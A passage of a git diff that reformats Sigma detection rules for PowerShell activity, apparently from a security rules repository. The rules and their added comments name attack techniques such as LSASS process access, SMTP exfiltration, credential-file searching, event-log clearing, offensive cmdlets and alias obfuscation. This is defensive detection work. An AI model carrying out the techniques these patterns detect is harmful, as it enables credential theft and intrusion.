a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 - type: similar - - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 - type: similar - - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 - type: similar + - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation + type: similar + - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic + type: similar + - id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module + type: similar status: experimental -description: Detects PowerShell module creation where the module Contents are set - to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential - abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable - to module load-order hijacking. +description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml b/sigma/builtin/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml index 844076689..4ec8fce64 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml @@ -1,14 +1,10 @@ title: Request A Single Ticket via PowerShell id: a861d835-af37-4930-bcd6-5b178bfb54df status: test -description: 'utilize native PowerShell Identity modules to query the domain to extract - the Service Principal Names for a single computer. - +description: | + utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. - A successful execution will output the SPNs for the endpoint in question. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml b/sigma/builtin/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml index b3684cc6c..8b61c03ec 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml @@ -1,8 +1,7 @@ title: PowerShell Script With File Hostname Resolving Capabilities id: fbc5e92f-3044-4e73-a5c6-1c4359b539de status: experimental -description: Detects PowerShell scripts that have capabilities to read files, loop - through them and resolve DNS host entries. +description: Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries. references: - https://www.fortypoundhead.com/showcontent.asp?artid=24022 - https://labs.withsecure.com/publications/fin7-target-veeam-servers @@ -29,7 +28,6 @@ detection: - Out-File condition: ps_script and selection falsepositives: - - The same functionality can be implemented by admin scripts, correlate with name - and creator + - The same functionality can be implemented by admin scripts, correlate with name and creator level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_root_certificate_installed.yml b/sigma/builtin/powershell/powershell_script/posh_ps_root_certificate_installed.yml index 0a63468c9..c0b65ff53 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_root_certificate_installed.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_root_certificate_installed.yml @@ -1,8 +1,7 @@ title: Root Certificate Installed - PowerShell id: 42821614-9264-4761-acfc-5772c3286f76 status: test -description: Adversaries may install a root certificate on a compromised system to - avoid warnings when connecting to adversary controlled web servers. +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md author: oscd.community, @redcanary, Zach Stanford @svch0st @@ -31,7 +30,6 @@ detection: - Cert:\LocalMachine\Root condition: ps_script and (1 of selection*) falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need - to test if GPO push doesn't trigger FP + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml b/sigma/builtin/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml index 03700109d..2cd0a24b7 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml @@ -1,8 +1,7 @@ title: Suspicious Invoke-Item From Mount-DiskImage id: 902cedee-0398-4e3a-8183-6f3a89773a96 status: test -description: Adversaries may abuse container files such as disk image (.iso, .vhd) - file formats to deliver malicious payloads that may not be tagged with MOTW. +description: Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso - https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml b/sigma/builtin/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml index 8720d0d1d..9811a92d2 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml @@ -1,8 +1,7 @@ title: PowerShell Script With File Upload Capabilities id: d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb status: experimental -description: Detects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet - to send data via either "PUT" or "POST" method. +description: Detects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet to send data via either "PUT" or "POST" method. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md - https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_send_mailmessage.yml b/sigma/builtin/powershell/powershell_script/posh_ps_send_mailmessage.yml index bda944de0..9728494e3 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_send_mailmessage.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_send_mailmessage.yml @@ -1,13 +1,9 @@ title: Powershell Exfiltration Over SMTP id: 9a7afa56-4762-43eb-807d-c3dc9ffe211b status: test -description: 'Adversaries may steal data by exfiltrating it over an un-encrypted network - protocol other than that of the existing command and control channel. - - The data may also be sent to an alternate network location from the main command - and control server. - - ' +description: | + Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. + The data may also be sent to an alternate network location from the main command and control server. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml b/sigma/builtin/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml index cd1d332f5..a074545ba 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml @@ -1,8 +1,8 @@ title: Powershell Sensitive File Discovery id: 7d416556-6502-45b2-9bad-9d2f05f38997 related: - - id: d23f2ba5-9da0-4463-8908-8ee47f614bb9 - type: derived + - id: d23f2ba5-9da0-4463-8908-8ee47f614bb9 + type: derived status: test description: Detect adversaries enumerate sensitive files references: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_set_acl.yml b/sigma/builtin/powershell/powershell_script/posh_ps_set_acl.yml index 3c39b64ec..de004eb06 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_set_acl.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_set_acl.yml @@ -1,12 +1,12 @@ title: PowerShell Script Change Permission Via Set-Acl - PsScript id: cae80281-ef23-44c5-873b-fd48d2666f49 related: - - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 - type: derived - - id: bdeb2cff-af74-4094-8426-724dc937f20a - type: derived - - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 - type: derived + - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp + type: derived + - id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low + type: derived + - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High + type: derived status: experimental description: Detects PowerShell scripts set ACL to of a file or a folder references: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_set_acl_susp_location.yml b/sigma/builtin/powershell/powershell_script/posh_ps_set_acl_susp_location.yml index 624faf165..4015adfa1 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_set_acl_susp_location.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_set_acl_susp_location.yml @@ -1,12 +1,12 @@ title: PowerShell Set-Acl On Windows Folder - PsScript id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 related: - - id: cae80281-ef23-44c5-873b-fd48d2666f49 - type: derived - - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 - type: derived - - id: bdeb2cff-af74-4094-8426-724dc937f20a - type: derived + - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low + type: derived + - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp + type: derived + - id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low + type: derived status: experimental description: Detects PowerShell scripts to set the ACL to a file in the Windows folder references: @@ -32,6 +32,7 @@ detection: - 'Set-Acl ' - '-AclObject ' selection_paths: + # Note: Add more suspicious paths ScriptBlockText|contains: - -Path "C:\Windows - -Path "C:/Windows @@ -43,6 +44,7 @@ detection: - -Path "$env:windir - -Path '$env:windir selection_permissions: + # Note: Add more suspicious permissions ScriptBlockText|contains: - FullControl - Allow diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml b/sigma/builtin/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml index d4bef5903..3e0266cf0 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml @@ -1,15 +1,14 @@ title: Change PowerShell Policies to an Insecure Level - PowerShell id: 61d0475c-173f-4844-86f7-f3eebae1c66b related: - - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f - type: similar - - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 - type: similar - - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 - type: similar + - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # ProcCreation Registry + type: similar + - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet + type: similar + - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # Registry + type: similar status: test -description: Detects changing the PowerShell script execution policy to a potentially - insecure level using the "Set-ExecutionPolicy" cmdlet. +description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet. references: - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1 - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml b/sigma/builtin/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml index 102c254be..b19b3c6f1 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml @@ -24,6 +24,7 @@ detection: ScriptBlockText|contains: - Invoke-SMBAutoBrute - Invoke-GPOLinks + # - 'Out-Minidump' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - Invoke-Potato condition: ps_script and selection falsepositives: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_software_discovery.yml b/sigma/builtin/powershell/powershell_script/posh_ps_software_discovery.yml index 7d18396bb..5e2356204 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_software_discovery.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_software_discovery.yml @@ -1,12 +1,10 @@ title: Detected Windows Software Discovery - PowerShell id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 status: test -description: Adversaries may attempt to enumerate software for a variety of reasons, - such as figuring out what security measures are present or if the compromised - system has a version of software that is vulnerable. +description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md - - https://github.com/harleyQu1nn/AggressorScripts + - https://github.com/harleyQu1nn/AggressorScripts # AVQuery.cna author: Nikita Nazarov, oscd.community date: 2020/10/16 modified: 2022/12/02 @@ -25,6 +23,7 @@ detection: - PowerShellCore/Operational selection: ScriptBlockText|contains|all: + # Example: Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize - get-itemProperty - \software\ - select-object diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_ace_tampering.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_ace_tampering.yml index 87605949d..6b6343645 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_ace_tampering.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_ace_tampering.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via Security Descriptors - ScriptBlock id: 2f77047c-e6e9-4c11-b088-a3de399524cd status: test -description: Detects usage of certain functions and keywords that are used to manipulate - security descriptors in order to potentially set a backdoor. As seen used in the - DAMP project. +description: Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project. references: - https://github.com/HarmJ0y/DAMP author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml index ed6caeb36..211001d1a 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml @@ -1,15 +1,10 @@ title: AD Groups Or Users Enumeration Using PowerShell - ScriptBlock id: 88f0884b-331d-403d-a3a1-b668cf035603 status: test -description: 'Adversaries may attempt to find domain-level groups and permission settings. - - The knowledge of domain-level permission groups can help adversaries determine - which groups exist and which users belong to a particular group. - - Adversaries may use this information to determine which users have elevated permissions, - such as domain administrators. - - ' +description: | + Adversaries may attempt to find domain-level groups and permission settings. + The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. + Adversaries may use this information to determine which users have elevated permissions, such as domain administrators. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml index 5cd17ea97..10ad276e0 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml @@ -1,11 +1,10 @@ title: Potential PowerShell Obfuscation Using Character Join id: e8314f79-564d-4f79-bc13-fbc0bf2660d8 related: - - id: 96cd126d-f970-49c4-848a-da3a09f55c55 - type: derived + - id: 96cd126d-f970-49c4-848a-da3a09f55c55 + type: derived status: test -description: Detects specific techniques often seen used inside of PowerShell scripts - to obfscuate Alias creation +description: Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -26,8 +25,11 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection: + # Example: + # Set-Alias -Name Y -Value (-join("Ne","w-O","bje","ct")) + # Set-Alias -Name X -Value (-join("Inv","oke","-","Exp","ression")) ScriptBlockText|contains|all: - - -Alias + - -Alias # For both "New-Alias" and "Set-Alias" - ' -Value (-join(' condition: ps_script and selection falsepositives: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml index db9a0c91d..412cbdd91 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml @@ -1,11 +1,10 @@ title: Suspicious Eventlog Clear id: 0f017df3-8f5a-414f-ad6b-24aff1128278 related: - - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5 - type: derived + - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5 + type: derived status: test -description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to - clear the Windows event logs +description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs references: - https://twitter.com/oroneequalsone/status/1568432028361830402 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md @@ -33,8 +32,6 @@ detection: - 'Clear-WinEvent ' condition: ps_script and selection falsepositives: - - Rare need to clear logs before doing something. Sometimes used by installers - or cleaner scripts. The script should be investigated to determine if it's - legitimate + - Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_directory_enum.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_directory_enum.yml index 1058aae8d..2c5a33b74 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_directory_enum.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_directory_enum.yml @@ -1,8 +1,7 @@ title: Powershell Directory Enumeration id: 162e69a7-7981-4344-84a9-0f1c9a217a52 status: test -description: Detects technique used by MAZE ransomware to enumerate directories using - Powershell +description: Detects technique used by MAZE ransomware to enumerate directories using Powershell references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md - https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_download.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_download.yml index 6b8306375..b6ec0f945 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_download.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_download.yml @@ -1,8 +1,8 @@ title: Suspicious PowerShell Download - Powershell Script id: 403c2cc0-7f6b-4925-9423-bfa573bed7eb related: - - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 - type: derived + - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 + type: derived status: test description: Detects suspicious PowerShell download command author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml index 1c9cbc9a6..799109e43 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml @@ -1,22 +1,12 @@ title: Powershell Execute Batch Script id: b5522a23-82da-44e5-9c8b-e10ed8955f88 status: test -description: 'Adversaries may abuse the Windows command shell for execution. - - The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is - the primary command prompt on Windows systems. - - The Windows command prompt can be used to control almost any aspect of a system, - with various permission levels required for different subsets of commands. - - Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential - commands to run, as well as normal scripting operations such as conditionals and - loops. - - Common uses of batch files include long or repetitive tasks, or the need to run - the same set of commands on multiple system - - ' +description: | + Adversaries may abuse the Windows command shell for execution. + The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. + The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. + Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. + Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_extracting.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_extracting.yml index a6ac96f1c..52062e7f8 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_extracting.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_extracting.yml @@ -1,16 +1,10 @@ title: Extracting Information with PowerShell id: bd5971a7-626d-46ab-8176-ed643f694f68 status: test -description: 'Adversaries may search local file systems and remote file shares for - files containing insecurely stored credentials. - - These can be files created by users to store their own credentials, shared credential - stores for a group of individuals, - - configuration files containing passwords for a system or service, or source code/binary - files containing embedded passwords. - - ' +description: | + Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. + These can be files created by users to store their own credentials, shared credential stores for a group of individuals, + configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_follina_execution.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_follina_execution.yml index 609d35e65..9eb9afdab 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_follina_execution.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_follina_execution.yml @@ -1,8 +1,7 @@ title: Troubleshooting Pack Cmdlet Execution id: 03409c93-a7c7-49ba-9a4c-a00badf2a153 status: test -description: Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190 - or action similar to "msdt" lolbin (as described in LOLBAS) +description: Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190 or action similar to "msdt" lolbin (as described in LOLBAS) references: - https://twitter.com/nas_bench/status/1537919885031772161 - https://lolbas-project.github.io/lolbas/Binaries/Msdt/ diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml index cf3132fb0..185da178c 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml @@ -1,8 +1,7 @@ title: Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy id: bbb9495b-58fc-4016-b9df-9a3a1b67ca82 status: test -description: Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy - is used to get the default password policy for an Active Directory domain. +description: Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy - https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml index 18e5b4df9..31adfc90d 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml @@ -1,8 +1,7 @@ title: PowerShell Get-Process LSASS in ScriptBlock id: 84c174ab-d3ef-481f-9c86-a50d0b8e3edb status: test -description: Detects a Get-Process command on lsass process, which is in almost all - cases a sign of malicious activity +description: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity references: - https://twitter.com/PythonResponder/status/1385064506049630211 author: Florian Roth (Nextron Systems) @@ -25,7 +24,6 @@ detection: ScriptBlockText|contains: Get-Process lsass condition: ps_script and selection falsepositives: - - Legitimate certificate exports invoked by administrators or users (depends on - processes in the environment - filter if unusable) + - Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable) level: high ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml index 434751214..44e8afc2f 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml @@ -1,8 +1,7 @@ title: Suspicious Hyper-V Cmdlets id: 42d36aa1-3240-4db0-8257-e0118dcdd9cd status: test -description: Adversaries may carry out malicious operations using a virtual instance - to avoid detection +description: Adversaries may carry out malicious operations using a virtual instance to avoid detection references: - https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_generic.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_generic.yml index e95b761af..82ca53a72 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_generic.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_generic.yml @@ -1,10 +1,10 @@ title: Suspicious PowerShell Invocations - Generic id: ed965133-513f-41d9-a441-e38076a0798f related: - - id: 3d304fda-78aa-43ed-975c-d740798a49c1 - type: derived - - id: bbb80e91-5746-4fbe-8898-122e2cafdbf4 - type: similar + - id: 3d304fda-78aa-43ed-975c-d740798a49c1 + type: derived + - id: bbb80e91-5746-4fbe-8898-122e2cafdbf4 + type: similar status: test description: Detects suspicious PowerShell invocation command parameters author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_specific.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_specific.yml index 7ddc467bb..5a790af0a 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_specific.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_specific.yml @@ -1,12 +1,12 @@ title: Suspicious PowerShell Invocations - Specific id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 related: - - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c - type: derived - - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 - type: similar - - id: 536e2947-3729-478c-9903-745aaffe60d2 - type: similar + - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c + type: derived + - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 + type: similar + - id: 536e2947-3729-478c-9903-745aaffe60d2 + type: similar status: test description: Detects suspicious PowerShell invocation command parameters author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml index e9e7ea43d..075c3bf3a 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml @@ -1,14 +1,9 @@ title: Change User Agents with WebRequest id: d4488827-73af-4f8d-9244-7b7662ef046e status: test -description: 'Adversaries may communicate using application layer protocols associated - with web traffic to avoid detection/network filtering by blending in with existing - traffic. - - Commands to the remote system, and often the results of those commands, will be - embedded within the protocol traffic between the client and server. - - ' +description: | + Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. + Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_iofilestream.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_iofilestream.yml index 0d83662f8..98c5b422b 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_iofilestream.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_iofilestream.yml 